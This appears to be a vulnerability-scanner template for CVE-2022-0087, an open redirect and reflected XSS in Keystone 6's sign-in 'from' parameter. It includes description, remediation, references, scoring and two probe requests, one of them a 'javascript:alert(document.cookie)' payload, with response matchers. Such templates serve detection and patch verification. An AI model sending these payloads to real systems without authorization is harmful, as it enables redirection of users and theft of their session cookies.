id: CVE-2022-0087 info: name: Keystone 6 Login Page - Open Redirect and Cross-Site Scripting author: ShivanshKhari severity: medium description: | On the login page, there is a "from=" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS. remediation: | Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6 reference: - https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e - https://nvd.nist.gov/vuln/detail/CVE-2022-0087 - https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0087 cwe-id: CWE-79 epss-score: 0.001 epss-percentile: 0.41295 cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 vendor: keystonejs product: keystone framework: node.js tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs http: - method: GET path: - "{{BaseURL}}/signin?from=https://interact.sh" - "{{BaseURL}}/signin?from=javascript:alert(document.cookie)" matchers-condition: and matchers: - type: word part: header words: - "Location: https://interact.sh" - type: word part: body words: - "alert(document.cookie)" # digest: 4b0a00483046022100c140ee61632dc67c9acc81a49ec451a15bb40801fed7f1b72d892508b42222ed022100e1b0b356f74b2f34f558cb407535b0fdecfbcdaaa934de641550cb0f2e1a290e:922c64590222798bb761d5b6d8e72950